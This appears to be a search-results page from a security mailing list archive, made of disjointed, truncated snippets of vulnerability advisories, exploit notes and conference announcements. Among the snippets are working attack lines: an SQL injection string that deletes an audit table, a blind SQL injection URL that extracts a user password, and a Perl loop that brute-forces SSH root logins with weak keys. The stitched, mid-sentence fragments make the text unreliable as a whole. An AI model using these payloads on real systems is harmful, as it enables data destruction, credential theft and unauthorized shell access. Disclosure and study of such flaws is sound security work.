Next Page >>
join
However if I send a url something where the action is
generate_tax_report and db contains arbitrary SQL code I should be
able to cause that to execute in the database in the query in RP.pm
beginning in line 1935. Whatever $form->{db} is gets directly
interpolated in and there is no whitelisting to ensure it is always
'ar' or 'ap.' The line where this occurs is 1941, and it reads JOIN
$form->{db} a ON (a.id = ac.trans_id)
So if the query string includes the url encoded equivalent of &db=ar a
join customer n on ar.id=customer.id; delete from audittrail; select *
from ar a join acc_trans ac on ar.id = ac.trans_id
To fully understand these bug descriptions, you'll need some knowledge of IRC
and ircu-specific features like how timestamps (TS) work.
Some of these vulnerabilities only affect servers with oplevels or zannels
enabled, which was the default (but not anymore). Oplevels (A/Upass) is a
feature that allows the creator of a new channel to set passwords on it that,
when used to join, automatically give ops. Zannels is a feature introduced in
2.10.12.02 that keeps empty channels alive for a while instead of destroying
them immediately, to avoid A/U passwords being set on a channel that was only
empty for a short time.
Zannels was enabled on Undernet on some servers for a short time and then
disabled because of the trouble it caused. Oplevels never were enabled.
allows a service provider to offer multicast services to MPLS VPN
customers.
A vulnerability exists in the implementation of MVPN that allows an
attacker to send specially crafted Multicast Distribution Tree (MDT)
Data Join messages that can cause the creation of extra multicast
states on the core routers. MDT Data Join messages can be sent in
unicast or multicast. The vulnerability can also allow leaking
multicast traffic from different MPLS VPNs. It is possible to receive
multicast traffic from VPNs that are not connected to the same
Provider Edge (PE) router. In order to successfully exploit this
Meeting Manager contains a buffer overflow vulnerability that may
result in a denial of service or remote code execution. The WebEx
Meeting Manager is a client-side program that is provided by the
Cisco WebEx meeting service. The Cisco WebEx meeting service
automatically downloads, installs, and configures Meeting Manager the
first time a user begins or joins a meeting.
When users connect to the WebEx meeting service, the WebEx Meeting
Manager is automatically upgraded to the latest version. There is a
manual workaround available for users who are not able to connect to
the WebEx meeting service.
Application : E-Friends
version : <= 4.98
Vendor : http://www.alstrasoft.com/efriends.htm
Description :
E-Friends is an online social networking script that allows you to start your own profitable community just like Friendster and MySpace social networking site plus the ability to offer paid membership subscriptions. E-Friends allow members to connect to people in their personal networks and make friends, match making, dating, blogging and join groups and events. Features include email importer, messaging system, classifieds, join groups, forums, affiliate program integrated, online chat, personal blog, calendar, custom profile URL, friends search, invite friends, hotornot image ranking, advance admin control panel, upload photos and many more.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
> I'm sorry you're frustrated. There are a lot of ways you can change the
> direction of ISC development. Firstly, you can submit source code - we like that
> one especially. Secondly, you can fund development, and have us develop code
> that you need or want done. Thirdly, you can join the BIND Forum and give us
> recommendations and feedback there. Or forth, you can simply ask us.
Well, under normal circumstances I might consider contributing code or
helping you get your collective security act together. However, other
ethically-questionable practices that the ISC engages in pretty much
Well, finest might be stretching it. However, at the very least, it'll be
more fun than getting your dags trimmed by a hungover dude in a black singlet.
We invite you, our herd, our fellow fleece growers, gathers and pullers, to
join us:
-----[ THE IMPLEMENTATION, V4.0
Kiwicon IV will be held at the same venue as previous Kiwicons, Victoria
University, Wellington, New Zealand on the weekend 27-28th November 2010.
> ./icebb.php, line 169
$icebb->client_ip = $input['ICEBB_USER_IP'];
> ./admin/index.php, line 112
$icebb->adsess = $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");
A hacker could exploit this security breach in order to alter a SQL request.
[|Exploit:|]
http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php
code.
The vectors for this attack include all the major browsers and Flash. In
co-operation with Adobe, the discoverers delayed public discussion to allow
a patch to be created. In the intervening time, other researchers have made
partial disclosures, but this is your chance to join co-discoverer Jeremiah
Grossman for a Black Hat webcast that deals with the attack from all sides.
Bring your questions - we'll have a Q&A session after the presentation.
Black Hat Japan is in the books and we're already looking forward to the
Washington DC and Europe events. If you missed Black Hat Tokyo, we have put
Vote for DotDotPwn as tool for next BackTrack release!! ->
http://www.backtrack-linux.org/forums/tool-requests/32082-dotdotpwn.html
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
CSCsk46770 and has been assigned the CVE identifier CVE-2008-1744.
SIP-Related Vulnerabilities
Cisco Unified Communications Manager versions 5.x and 6.x contain a
vulnerability in the handling of malformed SIP JOIN messages that may
result in a DoS condition. SIP processing cannot be disabled in Cisco
Unified Communications Manager. There is no workaround for this
vulnerability. This vulnerability is fixed in Cisco Unified
Communications Manager versions 5.1(2) and 6.1(1). This vulnerability
is documented in Cisco Bug ID CSCsi48115 and has been assigned the
- Sergey Gordeychik
http://www.webappsec.org/ The Web Application Security Consortium
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
>
>
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
> Vote for DotDotPwn as tool for next BackTrack release!! ->
> http://www.backtrack-linux.org/forums/tool-requests/32082-dotdotpwn.html
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
CSCsk46770 and has been assigned the CVE identifier CVE-2008-1744.
SIP-Related Vulnerabilities
Cisco Unified Communications Manager versions 5.x and 6.x contain a
vulnerability in the handling of malformed SIP JOIN messages that may
result in a DoS condition. SIP processing cannot be disabled in Cisco
Unified Communications Manager. There is no workaround for this
vulnerability. This vulnerability is fixed in Cisco Unified
Communications Manager versions 5.1(2) and 6.1(1). This vulnerability
is documented in Cisco Bug ID CSCsi48115 and has been assigned the
Regards,
- WASC Announcements
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
requests.id, requests.userid, requests.request, requests.added, categories.name
as cat FROM requests inner join categories on requests.cat = categories.id
inner join users on requests.userid = users.id
$categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------
Test:
------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
/done
Disconnecting..-done
Once the database is downloaded, contacts can be queried with SQL:
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
…
the evidence. Orablock can also be used to locate "stale" data - i.e. data
that has been deleted or updated. It can also be used to dump SCNs for data
blocks which can be useful during the examination of a compromised Oracle
box."
Please join us to learn about Oracle DB forensics from one of the innovators
of the field, as well as learn about his new tool and to get your questions
answered. The webcast will be held on December 18 at 1pm PST. The URL for
registration is:
http://w.on24.com/r.htm?e=122240&s=1&k=57F93C9128D5D1BBC64B8AE7177FB981
>
> http://www.procheckup.com/Vulnerability_PR08-20.php
>>
-
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
>>
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
>>
Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
$first = 1;
// Get the messages to be merged
$query = $db->query("
SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
FROM ".TABLE_PREFIX."posts p
LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)
WHERE p.tid='$tid' AND p.pid IN($pidin)
ORDER BY dateline ASC
");
-------------------------------------------------------------------------------
>
>
>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
# Vulnerability Info:
# Type: Sql/Xss
# Risk: Medium
#===========================================================
# Sql Injection:
# http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
#
# Xss:
# http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
#===========================================================
#################################################################
------------------
C] easy IP banning
------------------
this is a problem affecting Soldat from long time, in fact the bug is
just in the lack of a real check on the players which join the server,
in short it's enough one single UDP packet for being inside it.
While in the past the banning happened with malformed packets (I wrote
a PoC for it), in the recent versions is possible to exploit this
problem sending multiple join packets causing a banning of 20 minutes
for the source IP address.
damages so the foregoing limitation may not apply.
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
Hi Folks,
If you are interested by web attacks and stealth hacking, come and join
us at HITBSecConf Dubai [
http://conference.hackinthebox.org/hitbsecconf2010dxb/?page_id=680 ].
Next 21st April, TEHTRI-Security will talk about web security, during
this presentation: "Silent Steps: Improving the Stealthiness of Web
Hacking".
--
Michael Scheidell, CTO
Join SECNAP at SecureWorld Detroit 8-9
http://www.secnap.com/events for free and discounted seminar tickets
_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(tm).
For Information please see http://www.spammertrap.com
_________________________________________________________________________
Next Page>>
|
